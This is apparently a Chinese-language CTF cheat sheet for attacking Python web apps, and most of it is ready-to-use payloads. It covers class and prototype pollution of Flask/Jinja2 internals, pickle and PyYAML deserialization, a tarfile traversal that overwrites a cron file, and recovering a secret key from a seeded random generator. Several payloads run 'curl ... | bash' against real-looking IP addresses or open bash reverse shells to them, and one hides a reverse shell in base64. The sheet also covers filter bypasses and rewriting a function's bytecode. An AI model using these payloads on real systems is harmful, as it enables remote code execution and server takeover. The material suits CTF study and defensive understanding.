python

常见函数 Trick

os.path.join

如果一个参数是以 / 符号开头的,就将这个参数作为开头继续向后拼接。

1
os.path.join('uploads/', '/flag') => '/flag'

urllib.parse.urlparse

CVE-2023-24329:3.11.4 之前的 Python 版本中,如果 URL 模式以空格字符开头, urllib.parse.urlparse 函数将返回空的模式和主机名 ( netloc )。

1
2
>>> urllib.parse.urlparse(' file:///etc/passwd')
ParseResult(scheme='', netloc='', path=' file:///etc/passwd', params='', query='', fragment='')

RCE

命令执行

1
2
3
4
subprocess.check_output(["cp","/flag","/app/app.py"])
subprocess.run(["bash","-c","cat ../../../flag > app.py"])
os.popen("cat /flag").read() #有返回值
os.system("cat /flag") #无返回值

Eval Bypass脚本

1
python parselmouth.py --payload "'/flag'" --rule "__" "." "'" '"' "read" "chr" "\\" "/" "*" "$" "#" "@" "!" "+" "^" "A" "B" "C" "D" "E" "F" "G" "H" "I" "J" "K" "L" "M" "N" "O" "P" "Q" "R" "S" "T" "U" "V" "W" "X" "Y" "Z" "d" "e" "f" "g" "h" "i" "j" "k" "l" "m" "n" "o" "p" "q" "r" "s" "t" "u" "v" "w" "x" "y" "z"

要用 linux 环境运行,Windows会有奇奇怪怪的转义问题。

random 伪随机数

1
2
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)

image-20251014104716094

就是把网卡地址转化成一个 48 位整数输出给我了。

那么我们只需要获取到 服务器 的 网卡地址,再把这个网卡地址从 16 进制 转化为 10进制,不就可以得到种子了吗。

再看一下 python 随机数的生成,本质上就是梅森旋转算法是确定性的状态机,给定确定种子后的一个确定性算法,相同的种子必然产生相同的随机数序列。

那我现在的目的就是获取到 mac 地址了,问下ai,随便试试。

1
2
3
4
cat /sys/class/net/*/address
cat /sys/class/net/eth0/address
cat /sys/class/net/ens33/address
cat /sys/class/net/wlan0/address

读到了,转成 10 进制就好了。

1
2
3
4
5
import random

random.seed(2485376933074)
randStr = str(random.random() * 233)
print(randStr)

注意,random 算法与 python 版本有关,应该与题目环境版本相同。

tarfile模块

CVE-2007-4559

【Web】复现n00bzCTF2024 web题解(全)_conditionsweb 所属赛事: n00bzctf 2023-CSDN博客

该漏洞影响到Python的tarfile模块,可造成系统文件的任意读取和写入。CVE-2007-4559的基本原理与CVE-2001-1267类似,当使用tar打包一个包含 ../../../../../etc/passwd,并用管理员权限解包时,/etc/passwd 文件会被覆盖,同理使用文件链接也可以产生同样的效果。

1
2
3
4
5
6
import tarfile
import os

# Overwrite the cronjob
with tarfile.open('write.tar', 'w') as tar:
tar.add('cronjob.txt', arcname='../../../etc/cron.custom/cleanup-cron')

原型链污染

Python原型链污染(prototype-pollution-in-python) - Article_kelp - 博客园

前言

最近在看一些 python 原型链题目,虽然知道如何大概污染,但是对于具体参数名和细节不太清楚,就此文章学一下 python原型链污染。

python 原型链污染和 nodejs 原型链污染原理相似,nodejs 是对键值对的控制进行污染,而 python 只能对类的属性进行污染而不能污染类的方法。

污染常见函数

1
2
3
4
5
6
7
8
9
10
11
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

具体原理主播就不剖析了。

关键还是在于如何获取目标类。

实际生产环境中发现的可以污染的函数:

目前发现了Pydash模块中的set_set_with函数具有如上实例中merge函数类似的类属性赋值逻辑,能够实现污染攻击。

常规污染

1
2
3
4
5
6
7
8
9
{
"__class__": {
"__base__": {
"__base__": {
"execute_method": "lambda executor, target: (target.__del__(), setattr(target, 'alive', False), __import__('os').popen('env').read())"
}
}
}
}

如何获取目标类

获取全局变量

1
2
3
4
5
6
a = 1
def Funtion():
pass
class Class:
def __init__(self):
pass

看这样一段代码,我们知道,__init__ 作为一个类的内置方法,它常有一个 __globals__ 属性,也就是该函数所在的全局变量的 dict,而作为一个方法,它也有一个相同的 __globals__ 属性。

所以我们可以理解为:

1
Function.__globals__=Class.__init__.__globals__=全局变量Dict

获取其他模块

在全局变量的前提下,是我们都在 入口文件中的类对象或者属性 来进行操作的,但是如果我们操作的位置在入口文件中,而目标对象并不在入口文件当中,这时候我们就需要对其他加载过的模块来获取了。

import简单获取

当那个模块 在 入口目录处平行被调用的情况下,那么我们可以直接在全局下加载。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import demo
payload = {
"__init__":{
"__globals__":{
"demo":{
"a":4,
"B":{
"classa":5
}
}
}
}
}
##demo.py
a = 1
class B:
classa = 2

sys 获取

在很多环境当中,会引用第三方模块或者是内置模块,而不是简单的import同级文件下面的目录,所以我们就要借助sys模块中的module属性,这个属性能够加载出来在自运行开始所有已加载的模块,从而我们能够从属性中获取到我们想要污染的目标模块。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import sys
payload = {
"__init__":{
"__globals__":{
"sys":{
"modules":{
"demo":{
"a":4,
"B":{
"classa":5
}
}
}
}
}
}
}

loader 获取

那么如果没有 sys,我们需要先获取到 sys,然后再调用下面的方法获取其他模块。

获取 sys 我们常常可以使用 loader 获取。

loader 是一个 python 的模块加载器,其在importlib这一内置模块中有具体实现。而importlib模块下所有的py文件中均引入了sys模块,这样我们和上面的sys模块获取已加载模块就联系起来了,所以我们的目标就变成了只要获取了加载器loader,我们就可以通过loader.__init__.__globals__['sys']来获取到sys模块,然后再获取到我们想要的模块。

而其实 全局就存在这么一个 loader。

并且,__loader__内置属性会被赋值为加载该模块的loader,这样只要能获取到任意的模块便能通过__loader__属性获取到loader,而且对于python3来说除了在debug模式下的主文件中__loader__None以外,正常执行的情况每个模块的__loader__属性均有一个对应的类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
{
"__init__": {
"__globals__": {
"__loader__": {
"__init__": {
"__globals__": {
"sys": {
"modules": {
"jinja2": {
"runtime": {
"exported": ["*;__import__('os').system('ls /app > /result1');#"]
}
}
}
}
}
}
}
}
}
}

image-20251018182235921

当然也可以在 已加载的模块 中找到

image-20251018182843211

spec 获取

在python中还存在一个__spec__,包含了关于类加载时候的信息,他定义在Lib/importlib/_bootstrap.py的类ModuleSpec,所以可以直接采用<模块名>.__spec__.__init__.__globals__['sys']获取到sys模块。

1
{"key":"__class__.__init__.__globals__.__builtins__.__spec__.__init__.__globals__.sys.modules.jinja2.runtime.exported.2","value":"*;__import__('os').system('curl http://27.25.151.98:1338/shell.sh | bash');#"}

image-20251018182543577

函数参数默认值替换

1
2
3
4
5
6
7
8
def foo(a, b='abc', *, c=1, d=[]):
pass


print(foo.__defaults__)
print(foo.__kwdefaults__)
#('abc',)
#{'c': 1, 'd': []}

简单来说:

  • __defaults__* 前以 非关键词传参 的参数,以 元组 的形式返回。
  • __kwdefaults__* 后以 必须关键词传参 的参数,以 字典 的形式返回。

其他常见关键信息替换

jinja配置信息

常见配置替换

对于 jinja 模板,可以替换对应的 变量开始/结束值,语句开始结束值,密钥等等。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from flask import Flask

app = Flask(__name__)

print(app.jinja_env.variable_start_string)
print(app.jinja_env.variable_end_string)
print(app.jinja_env.block_start_string)
print(app.jinja_env.block_end_string)
print(app.secret_key)

#这里就可以对应进行替换了

{
"__init__": {
"__globals__": {
"app": {
"jinja_env": {
"variable_start_string": "[[",
"variable_end_string": "]]"
},
"secret_key": "key"
}
}
}
}
污染模板变量
1
2
3
4
5
6
7
#templates/index.html

<html>
<h1>{{flag if var1 else "No way!"}}</h1>
<body>
</body>
</html>

直接污染:

1
app.jinja_env.globals.var1=true
污染渲染时的操作来RCE

【Web】2023安洵杯第六届网络安全挑战赛 WP-CSDN博客

1
__init__.__globals__.__loader__.__init__.__globals__.sys.modules.jinja2.runtime.exported[0]

可以污染下面的值来利用 render_template_string / render_template 去 RCE。

利用 jinja2 编译模板时的包进行利用,源码如下。

image-20251217193136986

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
{
"__init__": {
"__globals__": {
"__loader__": {
"__init__": {
"__globals__": {
"sys": {
"modules": {
"jinja2": {
"runtime": {
"exported": ["*;__import__('os').system('ls /app > /result1');#"]
}
}
}
}
}
}
}
}
}
}

set_ 污染:
{"name":"__init__.__globals__.__loader__.__init__.__globals__.sys.modules.jinja2.runtime.exported.0","value":"*;import os;os.system('id')"}

data = {
"key": "__init__.__globals__.time.__spec__.__init__.__globals__.sys.modules.jinja2.runtime.exported.0",
"value": "*;import os;os.system('curl http://8.137.112.104/1.sh |bash');#"
}

在 Jinja2 的源代码中,我们知道渲染函数实际上调用了 environment.from_string,该函数随后调用 environment.compile 并返回一个由 __builtins__.compile 生成的代码对象。这个代码对象最终会被执行,如果我们能够控制这个代码对象,就能实现 RCE。

经过一些调试,我们发现一个名为 exported 的变量被添加到了源代码中,并在之后被编译进了代码对象。不难发现,它是 jinja2.runtime 中的一个字符串数组,因此我们可以来修改它,从而实现 RCE。

但是需要注意插入 payload 的位置是AST的根部分,是作为模板编译时的处理代码的一部分,同样受到模板缓存的影响,也就是说这里插入的 payload 只会在模板在第一次访问时触发。

got_first_request

用于判定是否某次请求为自Flask启动后第一次请求,是Flask.got_first_request函数的返回值,此外还会影响装饰器app.before_first_request的调用,而_got_first_request值为假时才会调用:

所以如果我们想调用第一次访问前的请求,还想要在后续请求中进行使用的话,我们就需要将_got_first_request从true改成false然后就能够在后续访问的过程中,仍然能够调用装饰器app.before_first_request下面的可用信息。、

1
2
3
4
5
6
7
8
9
payload={
"__init__":{
"__globals__":{
"app":{
"_got_first_request":false
}
}
}
}
_static_url_path

当python指定了static静态目录以后,我们再进行访问就会定向到static文件夹下面的对应文件而不会存在目录穿梭的漏洞,但是如果我们想要访问其他文件下面的敏感信息,我们就需要污染这个静态目录,让他自动帮我们实现定向。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#static/index.html

<html>
<h1>hello</h1>
<body>
</body>
</html>
@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "flag in ./flag but heres only static/index.html"
payload={
"__init__":{
"__globals__":{
"app":{
"_static_folder":"./"
}
}
}
}

image-20251018184454543

image-20251018184526380

__FILE__ 进行替换

感觉这个也是题目中比较常出现的了,有些时候题目为了读取源码给hint,往往会 open(__FILE__),这时候污染 __FILE__ 可以达到读取任意文件的目的。

1
2
3
4
5
6
7
{
"__init__" : {
"__globals__" : {
"__file__" : "/proc/1/environ"
}
}
}

proxy 进行替换

HTTP流量截断

发现存在任意文件读取,读下来之后发现 update() 函数中存在类似于原型链污染,可以利用来修改环境变量。这里拜读文章之后发现可以用 http_proxy 在服务端截断流量直接控制返回结果,再利用 render_template_string 触发 SSTI,执行系统指令。

http代理转发脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# proxy_server.py
from http.server import HTTPServer, BaseHTTPRequestHandler

class ProxyHandler(BaseHTTPRequestHandler):
def do_GET(self):
# 检查是否是目标请求
if "users" in self.path:
print(f"拦截到请求: {self.path}")

# 返回恶意Jinja2模板
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()

payload = "{{lipsum.__globals__['os'].popen('ls').read()}}"
self.wfile.write(payload.encode())
else:
# 正常代理其他请求
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(b"Normal response")


if __name__ == '__main__':
server = HTTPServer(('0.0.0.0', 8080), ProxyHandler)
print("代理服务器运行在 8080 端口...")
server.serve_forever()

exp:

1
2
3
4
5
6
7
8
9
10
11
PROXY = "xxxxx:8080"	
"__init__": {
"__globals__": {
"os": {
"environ": {
"http_proxy": PROXY
}
}
}
}
}

os.path.pardir

模板渲染的时候,防止目录穿梭进行的一个操作,而我们的os.path.pardir恰好是我们的..所以会进行报错,所以我们如果把这个地方进行修改为除..外的任意值,我们就可以进行目录穿梭了。

环境:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#app.py

from flask import Flask,request,render_template
import json
import os

app = Flask(__name__)

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "flag in ./flag but u just can use /file to vist ./templates/file"

@app.route("/<path:path>")
def render_page(path):
if not os.path.exists("templates/" + path):
return "not found", 404
return render_template(path)

app.run(host="0.0.0.0")

1
2
3
4
5
6
7
8
9
10
11
payload={
"__init__":{
"__globals__":{
"os":{
"path":{
"pardir":","
}
}
}
}
}

image-20251018185532127

打通

image-20251018185514775

污染 picklesafe_namessafe_modules

1
{"__init__":{"__globals__":{"safe_names":["eval"]}}}
1
{"__init__":{"__globals__":{"safe_modules":["builtins"]}}}

反序列化

pickle

常见于 COOKIE 中。

指令 描述 描述 栈上的变化
c 获取一个全局对象或import一个模块 c[module]\n[instance]\n 获得的对象入栈
o 寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象) o 这个过程中涉及到的数据都出栈,函数的返回值(或生成的对象)入栈
i 相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象) i[module]\n[callable]\n 这个过程中涉及到的数据都出栈,函数返回值(或生成的对象)入栈
N 实例化一个None N 获得的对象入栈
S 实例化一个字符串对象 S’xxx’\n(也可以使用双引号、'等python字符串形式) 获得的对象入栈
V 实例化一个UNICODE字符串对象 Vxxx\n 获得的对象入栈
I 实例化一个int对象 Ixxx\n 获得的对象入栈
F 实例化一个float对象 Fx.x\n 获得的对象入栈
R 选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数 R 函数和参数出栈,函数的返回值入栈
. 程序结束,栈顶的一个元素作为pickle.loads()的返回值 .
( 向栈中压入一个MARK标记 ( MARK标记入栈
t 寻找栈中的上一个MARK,并组合之间的数据为元组 t MARK标记以及被组合的数据出栈,获得的对象入栈
) 向栈中直接压入一个空元组 ) 空元组入栈
l 寻找栈中的上一个MARK,并组合之间的数据为列表 l MARK标记以及被组合的数据出栈,获得的对象入栈
] 向栈中直接压入一个空列表 ] 空列表入栈
d 寻找栈中的上一个MARK,并组合之间的数据为字典(数据必须有偶数个,即呈key-value对) d MARK标记以及被组合的数据出栈,获得的对象入栈
} 向栈中直接压入一个空字典 } 空字典入栈
p 将栈顶对象储存至memo_n pn\n
g 将memo_n的对象压栈 gn\n 对象被压栈
0 丢弃栈顶对象 0 栈顶对象被丢弃
b 使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置 b 栈上第一个元素出栈
s 将栈的第一个和第二个对象作为key-value对,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为key)中 s 第一、二个元素出栈,第三个元素(列表或字典)添加新值或被更新
u 寻找栈中的上一个MARK,组合之间的数据(数据必须有偶数个,即呈key-value对)并全部添加或更新到该MARK之前的一个元素(必须为字典)中 u MARK标记以及被组合的数据出栈,字典被更新
a 将栈的第一个元素append到第二个元素(列表)中 a 栈顶元素出栈,第二个元素(列表)被更新
e 寻找栈中的上一个MARK,组合之间的数据并extends到该MARK之前的一个元素(必须为列表)中 e MARK标记以及被组合的数据出栈,列表被更新

常规payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import subprocess
import pickle
import base64

class exp():
def __reduce__(self):
return (subprocess.check_output, (["cp","/flag","/app/app.py"],))

# return (subprocess.check_output, (["bash", "-c", "bash -i >& /dev/tcp/8.138.38.81/1337 0>&1"],))

e = exp()
exp = pickle.dumps(e)
user_b64 = base64.b64encode(exp).decode()
print(user_b64)


import pickle
import os
import base64

class exp(object):
def __reduce__(self):
s="""bash -c \"/bin/bash -i >& /dev/tcp/124.222.136.33/1337 0>&1\"').read()"""
# s = """nc 124.222.136.33 1337 -e /bin/sh"""
# s="""curl https://your-shell.com/124.222.136.33:1337 | sh """
return os.system, (s,)

e = exp()
s = pickle.dumps(e)
user = base64.b64encode(s).decode()
print(user)


import pickle
import urllib


class test(object):
def __reduce__(self):
return (eval, ("open('/flag.txt', 'r').read()",))


a = test()
s = pickle.dumps(a)
print(urllib.quote(s))


import base64

opcode = b'''cos
system
(S'bash -c "{echo,cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMTI0LjIyMi4xMzYuMzMiLDEzMzcpKTtbb3MuZHVwMihzLmZpbGVubygpLGYpZm9yIGYgaW4oMCwxLDIpXTtwdHkuc3Bhd24oImJhc2giKSc=}|{base64,-d}|{bash,-i}"'
tR.'''
opcode = base64.b64encode(opcode).decode("utf-8")
print(opcode)

bypass

R指令绕过
i 指令

先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象)。

1
2
3
4
5
opcode=b'''(S'stao'
I18
i__main__
Animal
.'''
b 指令

b 指令的底层实现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
def load_build(self):
stack = self.stack
state = stack.pop()
#首先获取栈上的字节码b前的一个元素,对于对象来说,该元素一般是存储有对象属性的dict
inst = stack[-1]
#获取该字典中键名为"__setstate__"的value
setstate = getattr(inst, "__setstate__", None)
#如果存在,则执行value(state)
if setstate is not None:
setstate(state)
return
slotstate = None
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
#如果"__setstate__"为空,则state与对象默认的__dict__合并,这一步其实就是将序列化前保存的持久化属性和对象属性字典合并
if state:
inst_dict = inst.__dict__
intern = sys.intern
for k, v in state.items():
if type(k) is str:
inst_dict[intern(k)] = v
else:
inst_dict[k] = v
#如果__setstate__和__getstate__都没有设置,则加载默认__dict__
if slotstate:
for k, v in slotstate.items():
setattr(inst, k, v)
dispatch[BUILD[0]] = load_build

当对象被序列化时调用 __getstate__,被反序列化时调用 __setstate__。重写时可以省略 __setstate__,但 __getstate__ 必须返回一个字典。如果 __getstate____setstate__ 都被省略, 那么就默认自动保存和加载对象的属性字典__dict__

如果我们将对象和字典 {"__setstate__":os.system},压入栈中,并执行 b 字节码,,由于对象此时并没有 __setstate__,所以这里b字节码相当于执行了 __dict__.update向对象的属性字典中添加了一对新的键值对。如果我们继续向栈中压入命令command,再次执行 b 字节码时,由于已经有了__setstate__,所以会将栈中字节码 b 的前一个元素当作 state,执行 __setstate__(state),也就是 os.system(command)

1
2
3
4
5
6
7
8
9
c__main__
Animal
S'Casual'
I18
o}(S"__setstate__" #用 '}'向栈中压入一个空字典,然后再通过u修改为{"__setstate__":os.system}
cos
system
ubS"whoami"
b.
o 指令

寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为 callable,第二个到第 n 个数据为参数,执行该函数(或实例化一个对象)。

1
2
3
4
payload = b'''(cos
system
S'bash -c "bash -i >& /dev/tcp/8.138.38.81/1337 0>&1"'
o.'''
1
2
3
4
5
6
7
8
shell = b'''bash -c "bash -i >& /dev/tcp/124.222.136.33/1337 0<&1"'''

payload = b'''(ctimeit
timeit
(cos
system
V''' + shell + b'''
oo.'''

变量覆盖

1
2
3
4
5
6
7
8
9
10
11
c__main__
stao
(S'name'
S'Hacker'
S'age'
I18
db(c__main__
Animal
S'Hacker'
I18
o.

这里 b 指令的作用是用来更新栈上的一个字典进行变量覆盖。

关键词绕过
unicode 绕过
1
2
3
4
5
6
7
8
9
b'''capp
admin
(Vsecr\u0065t
I1
db0(capp
User
S"admin"
I1
o.'''
十六进制绕过
1
2
3
4
5
6
7
8
9
b'''capp
admin
(S'\x73ecret'
I1
db0(capp
User
S"admin"
I1
o.'''
绕过 find_class 中仅 builtins 限制
getattr(builtins,'evil')
1
2
3
4
5
6
7
8
9
10
11
12
13
14
opcode=b'''cbuiltins
getattr
(cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
)RS'__builtins__'
tRS'eval'
tR(S'__import__("os").system("whoami")'
tR.
'''
获取到 pickle 模块,用 pickle.loads() 绕过 find_class 检查

当调用我们构造的字节码形式的 pickle.loads(payloads) 时,并不会触发 find_class

1
2
sopcode2=opcode=b"\x80\x03cbuiltins\ngetattr\n(cbuiltins\ngetattr\ncbuiltins\ndict\nX\x03\x00\x00\x00get\x86R(cbuiltins\nglobals\n)RS'pickle'\ntRS'loads'\ntRC\x19cos\nsystem\n(S'whoami'\ntR.\x85R."

接管任意函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
p1= b'''cbuiltins
getattr
p0
c__main__
index
p3
g0
(g3
S'__code__'
tRp4
I0
p5
I0
p6
I0
p7
I0
p8
I5
p9
I67
p10
c_codecs
encode
p33
g33
(Vt\x00d\x01d\x02d\x03d\x04\x8d\x03\xa0\x01\xa1\x00S\x00
S'latin-1'
tRp11
(NS'/etc/passwd'
S'r'
S'utf-8'
(S'encoding'
ttp12
(S'open'
S'read'
tp13
)p14
g0
(g4
S'co_filename'
tRp15
g0
(g4
S'co_name'
tRp16
I7
p17
g0
(g4
S'co_lnotab'
tRp18
)p19
)p20
ctypes
CodeType
(g5
g6
g7
g8
g9
g10
g11
g12
g13
g14
g15
g16
g17
g18
g19
g20
tRp21
cbuiltins
setattr
(g3
S"__code__"
g21
tR.'''

import base64
encrypted_p1 = base64.b64encode(p1)
print(encrypted_p1)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
import pickle
import pickletools
import base64


def generate_pickle_consts(consts, memo_id_start):
"""递归生成 pickle opcode 序列,支持 None, str, int, tuple 类型"""
lines = []
if consts is None:
lines.append(b'N') # NONE
elif isinstance(consts, str):
escaped_str = repr(consts)[1:-1] # 使用 repr 获取字符串的合法转义表示,去掉两端的引号
lines.append(f"S'{escaped_str}'\n".encode('ascii')) # STRING with \n
elif isinstance(consts, int):
lines.append(f"I{consts}\n".encode('ascii')) # INT with \n
elif isinstance(consts, tuple):
lines.append(b'(') # MARK
for item in consts:
lines.extend(generate_pickle_consts(item, memo_id_start)) # 递归处理
lines.append(b't') # TUPLE
else:
raise ValueError(f"Unsupported const type: {type(consts)}")
return lines


def generate_co_consts_pickle(consts_tuple, memo_id=12):
"""生成 co_consts 的 pickle 序列:元组 + p{memo_id}\n + 0"""
lines = generate_pickle_consts(consts_tuple, [memo_id])
lines.append(b'p' + str(memo_id).encode('ascii') + b'\n') # PUT with \n
lines.append(b'0') # POP
return b''.join(lines)


def generate_co_names_pickle(names_tuple, memo_id=13):
"""生成 co_names 的 pickle 序列:元组 + p{memo_id}\n + 0"""
lines = [b'('] # MARK
for name in names_tuple:
escaped_name = repr(name)[1:-1]
lines.append(f"S'{escaped_name}'\n".encode('ascii')) # STRING with \n
lines.append(b't') # TUPLE
lines.append(b'p' + str(memo_id).encode('ascii') + b'\n') # PUT with \n
lines.append(b'0') # POP
return b''.join(lines)


def generate_co_varnames_pickle(varnames_tuple, memo_id=14):
"""生成 co_varnames 的 pickle 序列:元组 + p{memo_id}\n + 0"""
lines = [b'('] # MARK
for name in varnames_tuple:
escaped_name = repr(name)[1:-1]
lines.append(f"S'{escaped_name}'\n".encode('ascii')) # STRING with \n
lines.append(b't') # TUPLE
lines.append(b'p' + str(memo_id).encode('ascii') + b'\n') # PUT with \n
lines.append(b'0') # POP
return b''.join(lines)


def generate_rce_pickle(target_module='__main__', target_func='src', new_source='''
def src():
return open('app.py', 'r').read() # 使用 open/read 匹配 co_names
'''):
# 编译新源代码,提取 code 对象
local_scope = {}
exec(new_source, local_scope)
new_func = local_scope[target_func] # 使用 target_func 获取函数
code_obj = new_func.__code__

# 提取 co_code 并转换为转义字符串
co_code_escaped =code_obj.co_code

# 生成 co_consts、co_names 和 co_varnames 的 pickle 序列
co_consts = generate_co_consts_pickle(code_obj.co_consts, memo_id=12)
co_names = generate_co_names_pickle(code_obj.co_names, memo_id=13)
co_varnames = generate_co_varnames_pickle(code_obj.co_varnames, memo_id=14)
print(co_consts)
print(code_obj.co_consts)
print(co_code_escaped)
print(co_names)
print(code_obj.co_names)
print(co_varnames)
print(code_obj.co_varnames)

# pickle 模板,动态填充 code 对象的属性
p1_template = '''cbuiltins
getattr
p0
0c{target_module}
{target_func}
p3
0g0
(g3
S'__code__'
tRp4
0I{co_argcount}
p5
0I{co_posonlyargcount}
p6
0I{co_kwonlyargcount}
p7
0I{co_nlocals}
p8
0I{co_stacksize}
p9
0I{co_flags}
p10
0c_codecs
encode
p33
(V'''
p2='''
S'latin-1'
tRp11
0{co_consts}{co_names}{co_varnames}g0
(g4
S'co_filename'
tRp15
0g0
(g4
S'co_name'
tRp16
0g0
(g4
S'co_qualname'
tRp22
0I{co_firstlineno}
p17
0g0
(g4
S'co_lnotab'
tRp18
0g0
(g4
S'co_exceptiontable'
tRp23
0(tp19
0(tp20
0ctypes
CodeType
(g5
g6
g7
g8
g9
g10
g11
g12
g13
g14
g15
g16
g22
g17
g18
g23
g19
g20
tRp21
0cbuiltins
setattr
(g3
S'__code__'
g21
tR.'''

# 填充模板并转为字节串
p1 = p1_template.format(
target_module=target_module,
target_func=target_func,
co_argcount = code_obj.co_argcount,
co_posonlyargcount=code_obj.co_posonlyargcount,
co_kwonlyargcount=code_obj.co_kwonlyargcount,
co_nlocals=code_obj.co_nlocals,
co_stacksize=code_obj.co_stacksize,
co_flags=code_obj.co_flags,
).encode('ascii')
p2 = p2.format(
co_consts=co_consts.decode('ascii'),
co_names=co_names.decode('ascii'),
co_varnames=co_varnames.decode('ascii'),
co_firstlineno=code_obj.co_firstlineno
).encode('ascii')

return p1+co_code_escaped+p2


# 示例使用
if __name__ == "__main__":
# 用户提供:目标函数名和源代码
target_func = 'src' #需要重写的函数名
new_source = '''
def src():
return
''' #其实没有也行
# 生成 pickle
p1 = generate_rce_pickle(target_func=target_func, new_source=new_source)
print(p1)
# 验证 pickle 有效性
pickletools.dis(p1) # 应无错误

# 输出 base64 编码,用于远程 RCE
encrypted_p1 = base64.b64encode(p1)
print("Base64 encoded pickle:", encrypted_p1.decode())

# 测试任意指令
new_source_arbitrary = '''
def src():
import os
import platform
result = f"System: {platform.system()}, User: {os.getenv('USERNAME')}"
with open('system_info.txt', 'w') as f:
f.write(result)
return result
'''# 覆盖的指令
p1_arbitrary = generate_rce_pickle(target_func=target_func, new_source=new_source_arbitrary)
print("\nArbitrary command pickle:")
print(p1_arbitrary)
pickletools.dis(p1_arbitrary) # 验证任意指令的 pickle 有效性
print("Base64 encoded arbitrary pickle:", base64.b64encode(p1_arbitrary).decode())

# 测试 RCE
def src():
print("=========")
return
src()
pickle.loads(p1_arbitrary)
src()

yaml

反序列化

SecMap - 反序列化(PyYAML) - Tr0y’s Blog

PyYaml反序列化漏洞详解-先知社区

通过 PyYAML 0day 展示安全默认设置的重要性 — Showcasing the Importance of Secure Defaults with a PyYAML 0day

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
yaml.load('exp: !!python/object/apply:os.system ["whoami"]')

yaml.load("exp: !!python/object/apply:os.system ['whoami']")

# 引号当然不是必须的
yaml.load("exp: !!python/object/apply:os.system [whoami]")

yaml.load("""
exp: !!python/object/apply:os.system
- whoami
""")

yaml.load("""
exp: !!python/object/apply:os.system
args: ["whoami"]
""")

# command 是 os.system 的参数名
yaml.load("""
exp: !!python/object/apply:os.system
kwds: {"command": "whoami"}
""")

yaml.load("!!python/object/apply:os.system [whoami]: exp")

yaml.load("!!python/object/apply:os.system [whoami]")

yaml.load("""
!!python/object/apply:os.system
- whoami
""")

yaml.full_load("""
!!python/object/new:type
args:
- exp
- !!python/tuple []
- {"extend": !!python/name:exec }
listitems: "__import__('os').system('whoami')"
""")

!!python/object/new:type
args:
- exp
- !!python/tuple []
- {"extend": !!python/name:exec }
